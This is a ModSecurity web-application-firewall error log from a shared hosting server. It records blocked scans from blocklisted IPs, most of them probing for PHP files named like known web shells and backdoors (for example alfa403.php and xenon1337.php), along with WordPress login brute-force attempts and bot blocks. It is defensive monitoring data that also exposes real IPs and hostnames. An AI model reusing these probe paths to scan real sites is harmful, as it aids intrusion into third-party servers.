[Tue May 26 19:01:29.811060 2026] [security2:error] [pid 1045635:tid 1045871] [client 20.151.130.61:19455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahWgsRhDcQXYr7SS5sUWWQAAAGo"]
[Tue May 26 19:01:29.811145 2026] [security2:error] [pid 1045635:tid 1045871] [client 20.151.130.61:19455] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahWgsRhDcQXYr7SS5sUWWQAAAGo"]
[Tue May 26 19:01:30.783582 2026] [security2:error] [pid 1045635:tid 1045779] [client 20.151.130.61:57790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahWgshhDcQXYr7SS5sUWcwAAAA4"]
[Tue May 26 19:01:30.783685 2026] [security2:error] [pid 1045635:tid 1045779] [client 20.151.130.61:57790] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahWgshhDcQXYr7SS5sUWcwAAAA4"]
[Tue May 26 19:01:30.871599 2026] [security2:error] [pid 1045635:tid 1045815] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgshhDcQXYr7SS5sUWawAAADI"]
[Tue May 26 19:01:31.411983 2026] [security2:error] [pid 1045635:tid 1045771] [client 20.206.111.203:5074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWgsxhDcQXYr7SS5sUWhQAAAAY"]
[Tue May 26 19:01:31.412092 2026] [security2:error] [pid 1045635:tid 1045771] [client 20.206.111.203:5074] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWgsxhDcQXYr7SS5sUWhQAAAAY"]
[Tue May 26 19:01:31.427092 2026] [security2:error] [pid 1045635:tid 1045889] [client 20.151.130.61:19403] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWgsxhDcQXYr7SS5sUWhgAAAHw"]
[Tue May 26 19:01:31.427188 2026] [security2:error] [pid 1045635:tid 1045889] [client 20.151.130.61:19403] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWgsxhDcQXYr7SS5sUWhgAAAHw"]
[Tue May 26 19:01:31.953427 2026] [security2:error] [pid 1045635:tid 1045817] [client 5.39.1.224:51908] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "rainadelproperties.com"] [uri "/robots.txt"] [unique_id "ahWgsxhDcQXYr7SS5sUWlwAAADQ"]
[Tue May 26 19:01:31.953548 2026] [security2:error] [pid 1045635:tid 1045817] [client 5.39.1.224:51908] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "rainadelproperties.com"] [uri "/robots.txt"] [unique_id "ahWgsxhDcQXYr7SS5sUWlwAAADQ"]
[Tue May 26 19:01:31.953602 2026] [security2:error] [pid 1045635:tid 1045637] [remote 185.190.18.72:51112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgsxhDcQXYr7SS5sUWkAAAewE"]
[Tue May 26 19:01:31.975316 2026] [security2:error] [pid 1045635:tid 1045814] [client 20.151.130.61:19627] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahWgsxhDcQXYr7SS5sUWmAAAADE"]
[Tue May 26 19:01:31.975410 2026] [security2:error] [pid 1045635:tid 1045814] [client 20.151.130.61:19627] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahWgsxhDcQXYr7SS5sUWmAAAADE"]
[Tue May 26 19:01:31.982918 2026] [security2:error] [pid 1045635:tid 1045882] [client 20.206.111.203:4562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWgsxhDcQXYr7SS5sUWmQAAAHU"]
[Tue May 26 19:01:31.983036 2026] [security2:error] [pid 1045635:tid 1045882] [client 20.206.111.203:4562] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWgsxhDcQXYr7SS5sUWmQAAAHU"]
[Tue May 26 19:01:32.443258 2026] [security2:error] [pid 1045635:tid 1045774] [client 20.206.111.203:4605] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWgtBhDcQXYr7SS5sUWqgAAAAk"]
[Tue May 26 19:01:32.443403 2026] [security2:error] [pid 1045635:tid 1045774] [client 20.206.111.203:4605] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWgtBhDcQXYr7SS5sUWqgAAAAk"]
[Tue May 26 19:01:32.545735 2026] [security2:error] [pid 1045635:tid 1045753] [remote 173.252.95.11:34044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.95.252.173.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWgtBhDcQXYr7SS5sUWqwAAYHU"]
[Tue May 26 19:01:32.578864 2026] [security2:error] [pid 1045635:tid 1045859] [client 20.151.130.61:38342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/pucci.php"] [unique_id "ahWgtBhDcQXYr7SS5sUWsgAAAF4"]
[Tue May 26 19:01:32.578971 2026] [security2:error] [pid 1045635:tid 1045859] [client 20.151.130.61:38342] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/pucci.php"] [unique_id "ahWgtBhDcQXYr7SS5sUWsgAAAF4"]
[Tue May 26 19:01:32.634216 2026] [security2:error] [pid 1045635:tid 1045862] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgtBhDcQXYr7SS5sUWqQAAAGE"]
[Tue May 26 19:01:32.824201 2026] [security2:error] [pid 1045635:tid 1045873] [client 20.151.130.61:19431] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/details/"] [unique_id "ahWgtBhDcQXYr7SS5sUWuwAAAGw"]
[Tue May 26 19:01:32.904863 2026] [security2:error] [pid 1045635:tid 1045792] [client 20.151.130.61:19593] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgtBhDcQXYr7SS5sUWvwAAABs"]
[Tue May 26 19:01:32.977101 2026] [security2:error] [pid 1045635:tid 1045788] [client 20.151.130.61:19431] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/audio/"] [unique_id "ahWgtBhDcQXYr7SS5sUWxAAAABc"]
[Tue May 26 19:01:33.012035 2026] [security2:error] [pid 1045635:tid 1045839] [client 20.206.111.203:4546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWgtRhDcQXYr7SS5sUWxQAAAEo"]
[Tue May 26 19:01:33.012154 2026] [security2:error] [pid 1045635:tid 1045839] [client 20.206.111.203:4546] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWgtRhDcQXYr7SS5sUWxQAAAEo"]
[Tue May 26 19:01:33.055106 2026] [security2:error] [pid 1045635:tid 1045775] [client 20.151.130.61:19593] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgtRhDcQXYr7SS5sUWyQAAAAo"]
[Tue May 26 19:01:33.217258 2026] [security2:error] [pid 1045635:tid 1045767] [client 20.151.130.61:19431] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahWgtRhDcQXYr7SS5sUWzQAAAAI"]
[Tue May 26 19:01:33.217395 2026] [security2:error] [pid 1045635:tid 1045767] [client 20.151.130.61:19431] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahWgtRhDcQXYr7SS5sUWzQAAAAI"]
[Tue May 26 19:01:33.333264 2026] [security2:error] [pid 1045635:tid 1045845] [client 54.39.136.75:60898] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "rainadelproperties.com"] [uri "/"] [unique_id "ahWgtRhDcQXYr7SS5sUW0QAAAFA"]
[Tue May 26 19:01:33.333399 2026] [security2:error] [pid 1045635:tid 1045845] [client 54.39.136.75:60898] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "rainadelproperties.com"] [uri "/"] [unique_id "ahWgtRhDcQXYr7SS5sUW0QAAAFA"]
[Tue May 26 19:01:33.728674 2026] [security2:error] [pid 1045635:tid 1045869] [client 20.206.111.203:4552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWgtRhDcQXYr7SS5sUW3AAAAGg"]
[Tue May 26 19:01:33.728779 2026] [security2:error] [pid 1045635:tid 1045869] [client 20.206.111.203:4552] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWgtRhDcQXYr7SS5sUW3AAAAGg"]
[Tue May 26 19:01:33.742480 2026] [security2:error] [pid 1045635:tid 1045810] [client 139.60.101.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWgtBhDcQXYr7SS5sUWsQAAAC0"], referer: https://www.anujtradingco.com/
[Tue May 26 19:01:34.143809 2026] [security2:error] [pid 1045635:tid 1045861] [client 20.151.130.61:19598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-temp.php"] [unique_id "ahWgthhDcQXYr7SS5sUW5wAAAGA"]
[Tue May 26 19:01:34.143921 2026] [security2:error] [pid 1045635:tid 1045861] [client 20.151.130.61:19598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-temp.php"] [unique_id "ahWgthhDcQXYr7SS5sUW5wAAAGA"]
[Tue May 26 19:01:34.544598 2026] [security2:error] [pid 1045635:tid 1045813] [client 20.206.111.203:4589] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWgthhDcQXYr7SS5sUW7wAAADA"]
[Tue May 26 19:01:34.544746 2026] [security2:error] [pid 1045635:tid 1045813] [client 20.206.111.203:4589] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWgthhDcQXYr7SS5sUW7wAAADA"]
[Tue May 26 19:01:34.970722 2026] [security2:error] [pid 1045635:tid 1045867] [client 139.60.101.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWgthhDcQXYr7SS5sUXAQAAAGY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1227710&moderation-hash=336c0b065427b68358c25d09f3c3482a
[Tue May 26 19:01:34.983577 2026] [security2:error] [pid 1045635:tid 1045791] [client 20.151.130.61:19416] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/buttons/"] [unique_id "ahWgthhDcQXYr7SS5sUXAgAAABo"]
[Tue May 26 19:01:35.054211 2026] [security2:error] [pid 1045635:tid 1045821] [client 20.206.111.203:5067] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWgtxhDcQXYr7SS5sUXAwAAADg"]
[Tue May 26 19:01:35.054297 2026] [security2:error] [pid 1045635:tid 1045821] [client 20.206.111.203:5067] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWgtxhDcQXYr7SS5sUXAwAAADg"]
[Tue May 26 19:01:35.058892 2026] [security2:error] [pid 1045635:tid 1045838] [client 20.151.130.61:19593] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWgtxhDcQXYr7SS5sUXBAAAAEk"]
[Tue May 26 19:01:35.236482 2026] [security2:error] [pid 1045635:tid 1045785] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgthhDcQXYr7SS5sUW-wAAABQ"]
[Tue May 26 19:01:35.242949 2026] [security2:error] [pid 1045635:tid 1045771] [client 20.151.130.61:19416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/xmu.php"] [unique_id "ahWgtxhDcQXYr7SS5sUXBQAAAAY"]
[Tue May 26 19:01:35.243030 2026] [security2:error] [pid 1045635:tid 1045771] [client 20.151.130.61:19416] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/xmu.php"] [unique_id "ahWgtxhDcQXYr7SS5sUXBQAAAAY"]
[Tue May 26 19:01:35.465640 2026] [security2:error] [pid 1045635:tid 1045824] [client 20.151.130.61:59533] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/mode.php"] [unique_id "ahWgtxhDcQXYr7SS5sUXDQAAADs"]
[Tue May 26 19:01:35.465805 2026] [security2:error] [pid 1045635:tid 1045824] [client 20.151.130.61:59533] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/mode.php"] [unique_id "ahWgtxhDcQXYr7SS5sUXDQAAADs"]
[Tue May 26 19:01:35.775803 2026] [security2:error] [pid 1045635:tid 1045765] [client 20.206.111.203:5058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWgtxhDcQXYr7SS5sUXFwAAAAA"]
[Tue May 26 19:01:35.775899 2026] [security2:error] [pid 1045635:tid 1045765] [client 20.206.111.203:5058] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWgtxhDcQXYr7SS5sUXFwAAAAA"]
[Tue May 26 19:01:36.120486 2026] [security2:error] [pid 1045635:tid 1045861] [client 20.151.130.61:19597] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahWguBhDcQXYr7SS5sUXHgAAAGA"]
[Tue May 26 19:01:36.120582 2026] [security2:error] [pid 1045635:tid 1045861] [client 20.151.130.61:19597] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahWguBhDcQXYr7SS5sUXHgAAAGA"]
[Tue May 26 19:01:36.261257 2026] [security2:error] [pid 1045635:tid 1045790] [client 20.206.111.203:4574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWguBhDcQXYr7SS5sUXJAAAABk"]
[Tue May 26 19:01:36.261418 2026] [security2:error] [pid 1045635:tid 1045790] [client 20.206.111.203:4574] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWguBhDcQXYr7SS5sUXJAAAABk"]
[Tue May 26 19:01:36.617974 2026] [security2:error] [pid 1045635:tid 1045860] [client 20.151.130.61:19445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahWguBhDcQXYr7SS5sUXLgAAAF8"]
[Tue May 26 19:01:36.618093 2026] [security2:error] [pid 1045635:tid 1045860] [client 20.151.130.61:19445] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.perfecttechgroup.com.md-74.webhostbox.net"] [uri "/dx.php"] [unique_id "ahWguBhDcQXYr7SS5sUXLgAAAF8"]
[Tue May 26 19:01:36.828721 2026] [security2:error] [pid 1045635:tid 1045889] [client 20.206.111.203:4576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWguBhDcQXYr7SS5sUXNwAAAHw"]
[Tue May 26 19:01:36.828826 2026] [security2:error] [pid 1045635:tid 1045889] [client 20.206.111.203:4576] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.evitafrica.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWguBhDcQXYr7SS5sUXNwAAAHw"]
[Tue May 26 19:01:37.004849 2026] [security2:error] [pid 1045635:tid 1045787] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWguBhDcQXYr7SS5sUXLQAAABY"]
